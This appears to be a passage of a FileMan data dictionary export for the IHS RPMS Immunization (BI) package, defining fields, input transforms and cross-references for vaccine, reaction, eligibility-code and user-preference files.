"^DD",9002084.118,9002084.1206,.01,1,1,0)
9002084.11826^B
"^DD",9002084.118,9002084.1206,.01,1,1,1)
S ^BIVIMMD(DA(1),26,"B",$E(X,1,30),DA)=""
"^DD",9002084.118,9002084.1206,.01,1,1,2)
K ^BIVIMMD(DA(1),26,"B",$E(X,1,30),DA)
"^DD",9002084.118,9002084.1206,.01,3)
Answer must be 1-30 characters in length.
"^DD",9002084.118,9002084.1206,.01,"DT")
3130222
"^DD",9002084.118,9002084.1206,.019,0)
SNOMED PREFERRED TERM^CJ8^^ ; ^N DIT S DIT(1)=$S($D(^BIVIMMD(D0,26,D1,0)):^(0),1:"") S X=$P(DIT(1),U,1),X=$$CONCPT^AUPNVUTL(X)
"^DD",9002084.118,9002084.1206,.019,9)
^
"^DD",9002084.118,9002084.1206,.019,9.01)
9002084.11826^.01
"^DD",9002084.118,9002084.1206,.019,9.1)
AUPNPT(#.01)
"^DD",9002084.118,9002084.1206,.019,"DT")
3130411
"^DD",9002084.118,9002084.1207,0)
LOINC CODES SUB-FIELD^^.019^2
"^DD",9002084.118,9002084.1207,0,"NM","LOINC CODES")
"^DD",9002084.118,9002084.1207,0,"UP")
9002084.118
"^DD",9002084.118,9002084.1207,.01,0)
LOINC CODES^F^^0;1^K:$L(X)>30!($L(X)<1) X
"^DD",9002084.118,9002084.1207,.01,1,0)
^.1
"^DD",9002084.118,9002084.1207,.01,1,1,0)
9002084.11827^B
"^DD",9002084.118,9002084.1207,.01,1,1,1)
S ^BIVIMMD(DA(1),27,"B",$E(X,1,30),DA)=""
"^DD",9002084.118,9002084.1207,.01,1,1,2)
K ^BIVIMMD(DA(1),27,"B",$E(X,1,30),DA)
"^DD",9002084.118,9002084.1207,.01,3)
Answer must be 1-30 characters in length.
"^DD",9002084.118,9002084.1207,.01,"DT")
3130222
"^DD",9002084.118,9002084.1207,.019,0)
LOINC TEXT^CJ8^^ ; ^N DIT S DIT(1)=$S($D(^BIVIMMD(D0,27,D1,0)):^(0),1:"") S X=$P(DIT(1),U,1),X=$$LOINCPT^AUPNVUTL(X)
"^DD",9002084.118,9002084.1207,.019,9)
^
"^DD",9002084.118,9002084.1207,.019,9.01)
9002084.11827^.01
"^DD",9002084.118,9002084.1207,.019,9.1)
AUPNLOINCPT(#.01)
"^DD",9002084.118,9002084.1207,.019,"DT")
3130506
"^DD",9002084.61,9002084.61,0)
FIELD^^1.01^2
"^DD",9002084.61,9002084.61,0,"DT")
2980521
"^DD",9002084.61,9002084.61,0,"IX","B",9002084.61,.01)
"^DD",9002084.61,9002084.61,0,"NM","BI USER SELECTIONS")
"^DD",9002084.61,9002084.61,0,"VRPK")
IMMUNIZATION
"^DD",9002084.61,9002084.61,.01,0)
DUZ-DASH-FILE#^RF^^0;1^K:$L(X)>30!($L(X)<1)!'(X'?1P.E) X
"^DD",9002084.61,9002084.61,.01,1,0)
^.1
"^DD",9002084.61,9002084.61,.01,1,1,0)
9002084.61^B
"^DD",9002084.61,9002084.61,.01,1,1,1)
S ^BISELECT("B",$E(X,1,30),DA)=""
"^DD",9002084.61,9002084.61,.01,1,1,2)
K ^BISELECT("B",$E(X,1,30),DA)
"^DD",9002084.61,9002084.61,.01,3)
Enter the user's DUZ concatenated to a dash and then to the File Number. Answer must be 1-30 characters in length.
"^DD",9002084.61,9002084.61,.01,"DT")
2980514
"^DD",9002084.61,9002084.61,1.01,0)
SELECTIONS^9002084.611A^^1;0
"^DD",9002084.61,9002084.611,0)
SELECTIONS SUB-FIELD^^.01^1
"^DD",9002084.61,9002084.611,0,"DT")
2980521
"^DD",9002084.61,9002084.611,0,"NM","SELECTIONS")
"^DD",9002084.61,9002084.611,0,"UP")
9002084.61
"^DD",9002084.61,9002084.611,.01,0)
SELECTIONS^NJ15,0X^^0;1^K:+X'=X!(X>999999999999999)!(X<0)!(X?.E1"."1N.N) X S:$D(X) DINUM=X
"^DD",9002084.61,9002084.611,.01,1,0)
^.1^^0
"^DD",9002084.61,9002084.611,.01,3)
Enter the IEN of the selection from this file to be saved for this user.
"^DD",9002084.61,9002084.611,.01,"DT")
2990719
"^DD",9002084.62,9002084.62,0)
FIELD^^.02^2
"^DD",9002084.62,9002084.62,0,"DT")
2980624
"^DD",9002084.62,9002084.62,0,"IX","B",9002084.62,.01)
"^DD",9002084.62,9002084.62,0,"NM","BI USER DATE-LOC LINE")
"^DD",9002084.62,9002084.62,0,"VRPK")
IMMUNIZATION
"^DD",9002084.62,9002084.62,.01,0)
DUZ^RFX^^0;1^K:$L(X)>30!($L(X)<1)!'(X'?1P.E) X S:$D(X) DINUM=X
"^DD",9002084.62,9002084.62,.01,1,0)
^.1
"^DD",9002084.62,9002084.62,.01,1,1,0)
9002084.62^B
"^DD",9002084.62,9002084.62,.01,1,1,1)
S ^BIDLOC("B",$E(X,1,30),DA)=""
"^DD",9002084.62,9002084.62,.01,1,1,2)
K ^BIDLOC("B",$E(X,1,30),DA)
"^DD",9002084.62,9002084.62,.01,3)
Enter the user's DUZ.
"^DD",9002084.62,9002084.62,.01,"DT")
2980624
"^DD",9002084.62,9002084.62,.02,0)
DATE-LOCATION LINE TEXT^F^^0;2^K:$L(X)>70!($L(X)<1) X
"^DD",9002084.62,9002084.62,.02,3)
Enter the Date/Location Line text to be saved for this user. Answer must be 1-70 characters in length.
"^DD",9002084.62,9002084.62,.02,"DT")
2980624
"^DD",9002084.63,9002084.63,0)
FIELD^^.03^3
"^DD",9002084.63,9002084.63,0,"DT")
2990401
"^DD",9002084.63,9002084.63,0,"IX","B",9002084.63,.01)
"^DD",9002084.63,9002084.63,0,"NM","BI USER AGE RANGE")
"^DD",9002084.63,9002084.63,0,"VRPK")
IMMUNIZATION
"^DD",9002084.63,9002084.63,.01,0)
DUZ^RFX^^0;1^K:$L(X)>30!($L(X)<1)!'(X'?1P.E) X S:$D(X) DINUM=X
"^DD",9002084.63,9002084.63,.01,1,0)
^.1
"^DD",9002084.63,9002084.63,.01,1,1,0)
9002084.63^B
"^DD",9002084.63,9002084.63,.01,1,1,1)
S ^BIAGRG("B",$E(X,1,30),DA)=""
"^DD",9002084.63,9002084.63,.01,1,1,2)
K ^BIAGRG("B",$E(X,1,30),DA)
"^DD",9002084.63,9002084.63,.01,3)
Enter the user's DUZ.
"^DD",9002084.63,9002084.63,.01,"DT")
2980625
"^DD",9002084.63,9002084.63,.02,0)
AGE RANGE^F^^0;2^K:$L(X)>30!($L(X)<1) X
"^DD",9002084.63,9002084.63,.02,3)
Enter the Age Range to be saved for this user. Answer must be 1-30 characters in length.
"^DD",9002084.63,9002084.63,.02,"DT")
2980625
"^DD",9002084.63,9002084.63,.03,0)
MODE MONTH OR YEAR^S^0:MONTH;1:YEAR;^0;3^Q
"^DD",9002084.63,9002084.63,.03,3)
Enter this user's last Mode for Age Range, by Month or by Year.
"^DD",9002084.63,9002084.63,.03,"DT")
2990401
"^DD",9002084.7,9002084.7,0)
FIELD^^.02^2
"^DD",9002084.7,9002084.7,0,"DT")
2990412
"^DD",9002084.7,9002084.7,0,"IX","B",9002084.7,.01)
"^DD",9002084.7,9002084.7,0,"NM","BI PACKAGE INFORMATION")
"^DD",9002084.7,9002084.7,0,"VRPK")
IMMUNIZATION
"^DD",9002084.7,9002084.7,.01,0)
NAME^RF^^0;1^K:$L(X)>50!($L(X)<3)!'(X'?1P.E) X
"^DD",9002084.7,9002084.7,.01,1,0)
^.1
"^DD",9002084.7,9002084.7,.01,1,1,0)
9002084.7^B
"^DD",9002084.7,9002084.7,.01,1,1,1)
S ^BINFO("B",$E(X,1,30),DA)=""
"^DD",9002084.7,9002084.7,.01,1,1,2)
K ^BINFO("B",$E(X,1,30),DA)
"^DD",9002084.7,9002084.7,.01,3)
Answer must be 3-50 characters in length.
"^DD",9002084.7,9002084.7,.01,"DT")
2990412
"^DD",9002084.7,9002084.7,.02,0)
TEXT OF PACKAGE INFORMATION^9002084.701^^1;0
"^DD",9002084.7,9002084.701,0)
TEXT OF PACKAGE INFORMATION SUB-FIELD^^.01^1
"^DD",9002084.7,9002084.701,0,"DT")
2990403
"^DD",9002084.7,9002084.701,0,"NM","TEXT OF PACKAGE INFORMATION")
"^DD",9002084.7,9002084.701,0,"UP")
9002084.7
"^DD",9002084.7,9002084.701,.01,0)
TEXT OF PACKAGE INFORMATION^WL^^0;1^Q
"^DD",9002084.7,9002084.701,.01,3)
Enter the text of the Package Information.
"^DD",9002084.7,9002084.701,.01,"DT")
2990403
"^DD",9002084.8,9002084.8,0)
FIELD^^.03^3
"^DD",9002084.8,9002084.8,0,"DT")
3030820
"^DD",9002084.8,9002084.8,0,"IX","B",9002084.8,.01)
"^DD",9002084.8,9002084.8,0,"IX","C",9002084.8,.02)
"^DD",9002084.8,9002084.8,0,"IX","U",9002084.8,.01)
"^DD",9002084.8,9002084.8,0,"NM","BI TABLE REACTION")
"^DD",9002084.8,9002084.8,0,"PT",90451.25,.06)
"^DD",9002084.8,9002084.8,0,"PT",90459.2323,.06)
"^DD",9002084.8,9002084.8,0,"PT",9000010.11,.06)
"^DD",9002084.8,9002084.8,0,"PT",9002084.118,.06)
"^DD",9002084.8,9002084.8,0,"VRPK")
IMMUNIZATION
"^DD",9002084.8,9002084.8,.01,0)
REACTION^RF^^0;1^K:$L(X)>30!($L(X)<3)!'(X'?1P.E) X
"^DD",9002084.8,9002084.8,.01,1,0)
^.1
"^DD",9002084.8,9002084.8,.01,1,1,0)
9002084.8^B
"^DD",9002084.8,9002084.8,.01,1,1,1)
S ^BIREC("B",$E(X,1,30),DA)=""
"^DD",9002084.8,9002084.8,.01,1,1,2)
K ^BIREC("B",$E(X,1,30),DA)
"^DD",9002084.8,9002084.8,.01,1,2,0)
9002084.8^U^MUMPS
"^DD",9002084.8,9002084.8,.01,1,2,1)
D UPXREF^BIUTL5(X,"^BIREC(")
"^DD",9002084.8,9002084.8,.01,1,2,2)
D KUPXREF^BIUTL5(X,"^BIREC(")
"^DD",9002084.8,9002084.8,.01,1,2,"%D",0)
^^2^2^2980219^
"^DD",9002084.8,9002084.8,.01,1,2,"%D",1,0)
This xref simply provides an all-uppercase lookup on selections that are
"^DD",9002084.8,9002084.8,.01,1,2,"%D",2,0)
mixed case.
"^DD",9002084.8,9002084.8,.01,1,2,"DT")
2980218
"^DD",9002084.8,9002084.8,.01,3)
Answer must be 3-30 characters in length.
"^DD",9002084.8,9002084.8,.01,"DT")
2980218
"^DD",9002084.8,9002084.8,.02,0)
NUMERIC CODE FOR THIS REACTION^NJ2,0^^0;2^K:+X'=X!(X>20)!(X<1)!(X?.E1"."1N.N) X
"^DD",9002084.8,9002084.8,.02,1,0)
^.1
"^DD",9002084.8,9002084.8,.02,1,1,0)
9002084.8^C
"^DD",9002084.8,9002084.8,.02,1,1,1)
S ^BIREC("C",$E(X,1,30),DA)=""
"^DD",9002084.8,9002084.8,.02,1,1,2)
K ^BIREC("C",$E(X,1,30),DA)
"^DD",9002084.8,9002084.8,.02,1,1,"DT")
2980217
"^DD",9002084.8,9002084.8,.02,3)
Type a Number between 1 and 20, 0 Decimal Digits
"^DD",9002084.8,9002084.8,.02,"DT")
2980217
"^DD",9002084.8,9002084.8,.03,0)
ACTIVE^S^0:INACTIVE;1:ACTIVE;^0;3^Q
"^DD",9002084.8,9002084.8,.03,3)
Select 0 or INACTIVE to prevent this Reaction from being selectable when entering new data.
"^DD",9002084.8,9002084.8,.03,"DT")
3030820
"^DD",9002084.82,9002084.82,0)
FIELD^^.03^3
"^DD",9002084.82,9002084.82,0,"DT")
3090528
"^DD",9002084.82,9002084.82,0,"IX","B",9002084.82,.01)
"^DD",9002084.82,9002084.82,0,"IX","U",9002084.82,.01)
"^DD",9002084.82,9002084.82,0,"NM","BI TABLE ADD INFO ITEMS")
"^DD",9002084.82,9002084.82,0,"VRPK")
IMMUNIZATION
"^DD",9002084.82,9002084.82,.01,0)
ITEM NAME^RF^^0;1^K:$L(X)>70!($L(X)<3)!'(X'?1P.E) X
"^DD",9002084.82,9002084.82,.01,1,0)
^.1
"^DD",9002084.82,9002084.82,.01,1,1,0)
9002084.82^B
"^DD",9002084.82,9002084.82,.01,1,1,1)
S ^BIADDIN("B",$E(X,1,30),DA)=""
"^DD",9002084.82,9002084.82,.01,1,1,2)
K ^BIADDIN("B",$E(X,1,30),DA)
"^DD",9002084.82,9002084.82,.01,1,2,0)
9002084.82^U^MUMPS
"^DD",9002084.82,9002084.82,.01,1,2,1)
D UPXREF^BIUTL5(X,"^BIADDIN(")
"^DD",9002084.82,9002084.82,.01,1,2,2)
D KUPXREF^BIUTL5(X,"^BIADDIN(")
"^DD",9002084.82,9002084.82,.01,1,2,"DT")
3090528
"^DD",9002084.82,9002084.82,.01,3)
Answer must be 3-70 characters in length
"^DD",9002084.82,9002084.82,.01,"DT")
3090528
"^DD",9002084.82,9002084.82,.02,0)
NUMBER^NJ2,0^^0;2^K:+X'=X!(X>30)!(X<0)!(X?.E1"."1N.N) X
"^DD",9002084.82,9002084.82,.02,3)
Type a Number between 0 and 30, 0 Decimal Digits
"^DD",9002084.82,9002084.82,.02,"DT")
3090520
"^DD",9002084.82,9002084.82,.03,0)
Short Name^F^^0;3^K:$L(X)>20!($L(X)<1) X
"^DD",9002084.82,9002084.82,.03,3)
Answer must be 1-20 characters in length.
"^DD",9002084.82,9002084.82,.03,"DT")
3090528
"^DD",9002084.83,9002084.83,0)
FIELD^^.05^5
"^DD",9002084.83,9002084.83,0,"DT")
3120905
"^DD",9002084.83,9002084.83,0,"ID",.02)
W " ",$P(^(0),U,2)
"^DD",9002084.83,9002084.83,0,"ID",.04)
W " ",$P(^(0),U,4)
"^DD",9002084.83,9002084.83,0,"IX","AC",9002084.83,.03)
"^DD",9002084.83,9002084.83,0,"IX","B",9002084.83,.01)
"^DD",9002084.83,9002084.83,0,"IX","C",9002084.83,.02)
"^DD",9002084.83,9002084.83,0,"IX","D",9002084.83,.04)
"^DD",9002084.83,9002084.83,0,"IX","E",9002084.83,.04)
"^DD",9002084.83,9002084.83,0,"IX","F",9002084.83,.05)
"^DD",9002084.83,9002084.83,0,"IX","U",9002084.83,.02)
"^DD",9002084.83,9002084.83,0,"NM","BI TABLE ELIGIBILITY CODES")
"^DD",9002084.83,9002084.83,0,"PT",9000010.11,.14)
"^DD",9002084.83,9002084.83,0,"PT",9002084.118,.14)
"^DD",9002084.83,9002084.83,0,"VRPK")
BI
"^DD",9002084.83,9002084.83,.01,0)
ELIGIBILITY CODE^RF^^0;1^K:$L(X)>8!($L(X)<1)!'(X'?1P.E) X
"^DD",9002084.83,9002084.83,.01,1,0)
^.1
"^DD",9002084.83,9002084.83,.01,1,1,0)
9002084.83^B
"^DD",9002084.83,9002084.83,.01,1,1,1)
S ^BIELIG("B",$E(X,1,30),DA)=""
"^DD",9002084.83,9002084.83,.01,1,1,2)
K ^BIELIG("B",$E(X,1,30),DA)
"^DD",9002084.83,9002084.83,.01,3)
Answer must be 1-8 characters in length.
"^DD",9002084.83,9002084.83,.01,"DT")
3120808
"^DD",9002084.83,9002084.83,.02,0)
LABEL-TEXT OF CODE^F^^0;2^K:$L(X)>30!($L(X)<1) X
"^DD",9002084.83,9002084.83,.02,1,0)
^.1
"^DD",9002084.83,9002084.83,.02,1,1,0)
9002084.83^C
"^DD",9002084.83,9002084.83,.02,1,1,1)
S ^BIELIG("C",$E(X,1,30),DA)=""
"^DD",9002084.83,9002084.83,.02,1,1,2)
K ^BIELIG("C",$E(X,1,30),DA)
"^DD",9002084.83,9002084.83,.02,1,1,"DT")
3120830
"^DD",9002084.83,9002084.83,.02,1,2,0)
9002084.83^U^MUMPS
"^DD",9002084.83,9002084.83,.02,1,2,1)
D UPXREF^BIUTL5(X,"^BIELIG(")
"^DD",9002084.83,9002084.83,.02,1,2,2)
D KUPXREF^BIUTL5(X,"^BIELIG(")
"^DD",9002084.83,9002084.83,.02,1,2,"DT")
3120830
"^DD",9002084.83,9002084.83,.02,3)
Answer must be 1-30 characters in length.
"^DD",9002084.83,9002084.83,.02,"DT")
3120830
"^DD",9002084.83,9002084.83,.03,0)
ACTIVE^S^0:ACTIVE;1:INACTIVE;^0;3^Q
"^DD",9002084.83,9002084.83,.03,1,0)
^.1
"^DD",9002084.83,9002084.83,.03,1,1,0)
9002084.83^AC^MUMPS
"^DD",9002084.83,9002084.83,.03,1,1,1)
S ^BIELIG("AC",X,$P(^BIELIG(DA,0),"^",1),DA)=""
"^DD",9002084.83,9002084.83,.03,1,1,2)
K ^BIELIG("AC",X,$P(^BIELIG(DA,0),"^",1),DA)
"^DD",9002084.83,9002084.83,.03,1,1,"DT")
3120905
"^DD",9002084.83,9002084.83,.03,3)
Enter A for Active if this code should available when adding immunizations. If not, enter I for Inactive.
"^DD",9002084.83,9002084.83,.03,"DT")
3120905
"^DD",9002084.83,9002084.83,.04,0)
LOCAL TEXT^F^^0;4^K:$L(X)>20!($L(X)<1) X
"^DD",9002084.83,9002084.83,.04,1,0)
^.1
"^DD",9002084.83,9002084.83,.04,1,1,0)
9002084.83^D
"^DD",9002084.83,9002084.83,.04,1,1,1)
S ^BIELIG("D",$E(X,1,30),DA)=""
"^DD",9002084.83,9002084.83,.04,1,1,2)
K ^BIELIG("D",$E(X,1,30),DA)
"^DD",9002084.83,9002084.83,.04,1,1,"DT")
3120830
"^DD",9002084.83,9002084.83,.04,1,2,0)
9002084.83^E^MUMPS
"^DD",9002084.83,9002084.83,.04,1,2,1)
D UPXREF^BIUTL5(X,"^BIELIG(")
"^DD",9002084.83,9002084.83,.04,1,2,2)
D KUPXREF^BIUTL5(X,"^BIELIG(")
"^DD",9002084.83,9002084.83,.04,1,2,"DT")
3120830
"^DD",9002084.83,9002084.83,.04,3)
Enter a locally meaningful Label for this Eligibility Code (up to 20 characters).
"^DD",9002084.83,9002084.83,.04,"DT")
3120905
"^DD",9002084.83,9002084.83,.05,0)
REPORT ABBREVIATION^F^^0;5^K:$L(X)>9!($L(X)<1) X
"^DD",9002084.83,9002084.83,.05,1,0)
^.1
"^DD",9002084.83,9002084.83,.05,1,1,0)
9002084.83^F
"^DD",9002084.83,9002084.83,.05,1,1,1)
S ^BIELIG("F",$E(X,1,30),DA)=""
"^DD",9002084.83,9002084.83,.05,1,1,2)
K ^BIELIG("F",$E(X,1,30),DA)
"^DD",9002084.83,9002084.83,.05,1,1,"DT")
3120913
"^DD",9002084.83,9002084.83,.05,3)
Enter an abbreviation for this Code that will display on the Report (up to 9 characters).
"^DD",9002084.83,9002084.83,.05,"DT")
3120913
"^DD",9002084.94,9002084.94,0)
FIELD^^1.15^29
"^DD",9002084.94,9002084.94,0,"DDA")
N
"^DD",9002084.94,9002084.94,0,"DT")
3080630
"^DD",9002084.94,9002084.94,0,"ID",.02)
W " ",$P(^(0),U,2)
"^DD",9002084.94,9002084.94,0,"ID",.03)
W " ",$P(^(0),U,3)
"^DD",9002084.94,9002084.94,0,"IX","B",9002084.94,.01)
"^DD",9002084.94,9002084.94,0,"IX","C",9002084.94,.03)
"^DD",9002084.94,9002084.94,0,"IX","D",9002084.94,.02)
"^DD",9002084.94,9002084.94,0,"IX","E",9002084.94,.1)
"^DD",9002084.94,9002084.94,0,"NM","BI IMMUNIZATION TABLE HL7/CVX STANDARD")
"^DD",9002084.94,9002084.94,0,"PT",9002084.94,.21)
"^DD",9002084.94,9002084.94,0,"PT",9002084.94,.22)
"^DD",9002084.94,9002084.94,0,"PT",9002084.94,.23)
"^DD",9002084.94,9002084.94,0,"PT",9002084.94,.24)
"^DD",9002084.94,9002084.94,0,"PT",9002084.94,.25)
"^DD",9002084.94,9002084.94,0,"PT",9002084.94,.26)
"^DD",9002084.94,9002084.94,0,"PT",9002084.95,.2)
"^DD",9002084.94,9002084.94,0,"PT",9002084.96,.04)
"^DD",9002084.94,9002084.94,0,"VRPK")
IMMUNIZATION
"^DD",9002084.94,9002084.94,.01,0)
NAME^RF^^0;1^K:$L(X)>100!($L(X)<3)!'(X'?1P.E) X
"^DD",9002084.94,9002084.94,.01,1,0)
^.1
"^DD",9002084.94,9002084.94,.01,1,1,0)
9002084.94^B
"^DD",9002084.94,9002084.94,.01,1,1,1)
S ^BITN("B",$E(X,1,30),DA)=""
"^DD",9002084.94,9002084.94,.01,1,1,2)
K ^BITN("B",$E(X,1,30),DA)
"^DD",9002084.94,9002084.94,.01,3)
Answer must be 3-100 characters in length
"^DD",9002084.94,9002084.94,.01,"DT")
3030203
"^DD",9002084.94,9002084.94,.02,0)
SHORT NAME^RF^^0;2^K:$L(X)>10!($L(X)<2) X
"^DD",9002084.94,9002084.94,.02,1,0)
^.1
"^DD",9002084.94,9002084.94,.02,1,1,0)
9002084.94^D
"^DD",9002084.94,9002084.94,.02,1,1,1)
S ^BITN("D",$E(X,1,30),DA)=""
"^DD",9002084.94,9002084.94,.02,1,1,2)
K ^BITN("D",$E(X,1,30),DA)
"^DD",9002084.94,9002084.94,.02,1,1,"DT")
2980316
"^DD",9002084.94,9002084.94,.02,3)
Answer must be 2-10 characters in length.
"^DD",9002084.94,9002084.94,.02,"DT")
2990811
"^DD",9002084.94,9002084.94,.03,0)
HL7-CVX CODE^NJ3,0I^^0;3^K:+X'=X!(X>999)!(X<0)!(X?.E1"."1N.N) X
"^DD",9002084.94,9002084.94,.03,1,0)
^.1
"^DD",9002084.94,9002084.94,.03,1,1,0)
9002084.94^C
"^DD",9002084.94,9002084.94,.03,1,1,1)
S ^BITN("C",$E(X,1,30),DA)=""
"^DD",9002084.94,9002084.94,.03,1,1,2)
K ^BITN("C",$E(X,1,30),DA)
"^DD",9002084.94,9002084.94,.03,1,1,"DT")
2980323
"^DD",9002084.94,9002084.94,.03,3)
Enter the HL7 Code that represents this vaccine.
"^DD",9002084.94,9002084.94,.03,"DT")
3030219
"^DD",9002084.94,9002084.94,.05,0)
MAXIMUM# DOSES IN SERIES^NJ1,0I^^0;5^K:+X'=X!(X>9)!(X<0)!(X?.E1"."1N.N) X
"^DD",9002084.94,9002084.94,.05,3)
Enter the maximum number of doses in a series for this vaccine. Zero or null indicates this is not a series vaccine.
"^DD",9002084.94,9002084.94,.05,"DT")
2981022
"^DD",9002084.94,9002084.94,.07,0)
ACTIVE^S^0:ACTIVE;1:INACTIVE;^0;7^Q
"^DD",9002084.94,9002084.94,.07,3)
Enter ACTIVE if people should be able to select this Immunization/Vaccine Name when entering new immunizations. Enter INACTIVE if it should no longer appear as a valid choice.
"^DD",9002084.94,9002084.94,.07,"DT")
2981022
"^DD",9002084.94,9002084.94,.08,0)
SKIN TEST^S^0:NOT A SKIN TEST;1:SKIN TEST;^0;8^Q
"^DD",9002084.94,9002084.94,.08,"DT")
3051018
"^DD",9002084.94,9002084.94,.09,0)
VACCINE GROUP (SERIES TYPE)^P9002084.93'I^BISERT(^0;9^Q
"^DD",9002084.94,9002084.94,.09,3)
Select the Imm/Serve Series Type (or "Vaccine Group") to which this vaccine belongs.
"^DD",9002084.94,9002084.94,.09,"DT")
3030304
"^DD",9002084.94,9002084.94,.1,0)
ALTERNATE SHORT NAME^FI^^0;10^K:$L(X)>10!($L(X)<2) X
"^DD",9002084.94,9002084.94,.1,1,0)
^.1
"^DD",9002084.94,9002084.94,.1,1,1,0)
9002084.94^E
"^DD",9002084.94,9002084.94,.1,1,1,1)
S ^BITN("E",$E(X,1,30),DA)=""
"^DD",9002084.94,9002084.94,.1,1,1,2)
K ^BITN("E",$E(X,1,30),DA)
"^DD",9002084.94,9002084.94,.1,1,1,"DT")
2980410
"^DD",9002084.94,9002084.94,.1,3)
Enter an alternative Short Name for this vaccine, if desired. Answer must be 2-10 characters in length.
"^DD",9002084.94,9002084.94,.1,"DT")
2990318
"^DD",9002084.94,9002084.94,.11,0)
CPT CODE^P81'^ICPT(^0;11^Q
"^DD",9002084.94,9002084.94,.11,3)
Select the CPT Code for this vaccine.
"^DD",9002084.94,9002084.94,.11,"DT")
3050707
"^DD",9002084.94,9002084.94,.12,0)
RELATED CONTRAIND HL7 CODES^F^^0;12^K:$L(X)>100!($L(X)<1) X
"^DD",9002084.94,9002084.94,.12,3)
Answer must be 1-100 characters in length.
"^DD",9002084.94,9002084.94,.12,"DT")
3031028
"^DD",9002084.94,9002084.94,.13,0)
VIS DEFAULT DATE^D^^0;13^S %DT="EX" D ^%DT S X=Y K:Y<1 X
"^DD",9002084.94,9002084.94,.13,3)
Enter the default date of the Vaccine Information Statement (Parent Information Sheet) for this vaccine.
"^DD",9002084.94,9002084.94,.13,"DT")
3031208
"^DD",9002084.94,9002084.94,.14,0)
ICD DIAGNOSIS CODE^FI^^0;14^K:$L(X)>8!($L(X)<1) X
"^DD",9002084.94,9002084.94,.14,3)
Enter the ICD Diagnosis Code for this vaccine.
"^DD",9002084.94,9002084.94,.14,"DT")
2981022
"^DD",9002084.94,9002084.94,.15,0)
ICD PROCEDURE CODE^FI^^0;15^K:$L(X)>8!($L(X)<1) X
"^DD",9002084.94,9002084.94,.15,3)
Enter the ICD Procedure Code for this vaccine.
"^DD",9002084.94,9002084.94,.15,"DT")
2981022
"^DD",9002084.94,9002084.94,.16,0)
INCLUDE IN FORECAST^S^0:YES, INCLUDE;1:NO, EXCLUDE;^0;16^Q
"^DD",9002084.94,9002084.94,.16,"DT")
3031202
"^DD",9002084.94,9002084.94,.17,0)
INCLUDE IN VAC ACCOUNT REPORT^S^1:YES;0:NO;^0;17^Q
"^DD",9002084.94,9002084.94,.17,3)
Answer YES if this vaccine should be included in the Vaccine Accountability Report; answer NO if not.
"^DD",9002084.94,9002084.94,.17,"DT")
3030304
"^DD",9002084.94,9002084.94,.18,0)
DEFAULT VOLUME^NJ4,2^^0;18^K:+X'=X!(X>5)!(X<0)!(X?.E1"."3N.N) X
"^DD",9002084.94,9002084.94,.18,3)
Type a Number between 0 and 5, 2 Decimal Digits
"^DD",9002084.94,9002084.94,.18,"DT")
3031126
"^DD",9002084.94,9002084.94,.21,0)
COMPONENT #1^P9002084.94'^BITN(^0;21^Q
"^DD",9002084.94,9002084.94,.21,3)
Select the first component of this vaccine.
"^DD",9002084.94,9002084.94,.21,"DT")
3030226
"^DD",9002084.94,9002084.94,.22,0)
COMPONENT #2^P9002084.94'^BITN(^0;22^Q
"^DD",9002084.94,9002084.94,.22,3)
Select the second component of this vaccine.
"^DD",9002084.94,9002084.94,.22,"DT")
3030226
"^DD",9002084.94,9002084.94,.23,0)
COMPONENT #3^P9002084.94'^BITN(^0;23^Q
"^DD",9002084.94,9002084.94,.23,3)
Select the third component of this vaccine.
"^DD",9002084.94,9002084.94,.23,"DT")
3030226
"^DD",9002084.94,9002084.94,.24,0)
COMPONENT #4^P9002084.94'^BITN(^0;24^Q
"^DD",9002084.94,9002084.94,.24,3)
Select the fourth component of this vaccine.
"^DD",9002084.94,9002084.94,.24,"DT")
3030226
"^DD",9002084.94,9002084.94,.25,0)
COMPONENT #5^P9002084.94'^BITN(^0;25^Q
"^DD",9002084.94,9002084.94,.25,3)
Select the fifth component of this vaccine.
"^DD",9002084.94,9002084.94,.25,"DT")
3030226
"^DD",9002084.94,9002084.94,.26,0)
COMPONENT #6^P9002084.94'^BITN(^0;26^Q
"^DD",9002084.94,9002084.94,.26,3)
Select the sixth component of this vaccine.
"^DD",9002084.94,9002084.94,.26,"DT")
3030226
"^DD",9002084.94,9002084.94,1.01,0)
BRAND #1^F^^1;1^K:$L(X)>30!($L(X)<1) X
"^DD",9002084.94,9002084.94,1.01,3)
Enter a brand name for this vaccine. Answer must be 1-30 characters in length.
"^DD",9002084.94,9002084.94,1.01,"DT")
3030211
"^DD",9002084.94,9002084.94,1.03,0)
BRAND #2^F^^1;3^K:$L(X)>30!($L(X)<1) X
"^DD",9002084.94,9002084.94,1.03,3)
Enter a brand name for this vaccine. Answer must be 1-30 characters in length.
"^DD",9002084.94,9002084.94,1.03,"DT")
3030211
"^DD",9002084.94,9002084.94,1.05,0)
BRAND #3^F^^1;5^K:$L(X)>30!($L(X)<1) X
"^DD",9002084.94,9002084.94,1.05,3)
Enter a brand name for this vaccine. Answer must be 1-30 characters in length.
"^DD",9002084.94,9002084.94,1.05,"DT")
3030211
"^DD",9002084.94,9002084.94,1.07,0)
BRAND #4^F^^1;7^K:$L(X)>30!($L(X)<1) X
"^DD",9002084.94,9002084.94,1.07,3)
Enter a brand name for this vaccine. Answer must be 1-30 characters in length.
"^DD",9002084.94,9002084.94,1.07,"DT")
3030211
"^DD",9002084.94,9002084.94,1.09,0)
BRAND #5^F^^1;9^K:$L(X)>30!($L(X)<1) X
"^DD",9002084.94,9002084.94,1.09,3)
Enter a brand name for this vaccine. Answer must be 1-30 characters in length.
"^DD",9002084.94,9002084.94,1.09,"DT")
3030211
"^DD",9002084.94,9002084.94,1.14,0)
FULL NAME^F^^1;14^K:$L(X)>80!($L(X)<3) X
"^DD",9002084.94,9002084.94,1.14,3)
Answer must be 3-80 characters in length
"^DD",9002084.94,9002084.94,1.14,"DT")
3030219
"^DD",9002084.94,9002084.94,1.15,0)
CPT CODE 2ND^P81'^ICPT(^1;15^Q
"^DD",9002084.94,9002084.94,1.15,3)
Enter a second CPT Code for this vaccine.
"^DD",9002084.94,9002084.94,1.15,"DT")
3080630
"^DD",9002084.95,9002084.95,0)
FIELD^^.06^6
"^DD",9002084.95,9002084.95,0,"DT")
3140826
"^DD",9002084.95,9002084.95,0,"IX","B",9002084.95,.01)
"^DD",9002084.95,9002084.95,0,"IX","C",9002084.95,.02)
"^DD",9002084.95,9002084.95,0,"IX","D",9002084.95,.03)
"^DD",9002084.95,9002084.95,0,"IX","E",9002084.95,.04)
"^DD",9002084.95,9002084.95,0,"NM","BI TABLE NDC CODES")
"^DD",9002084.95,9002084.95,0,"PT",9000010.11,.16)
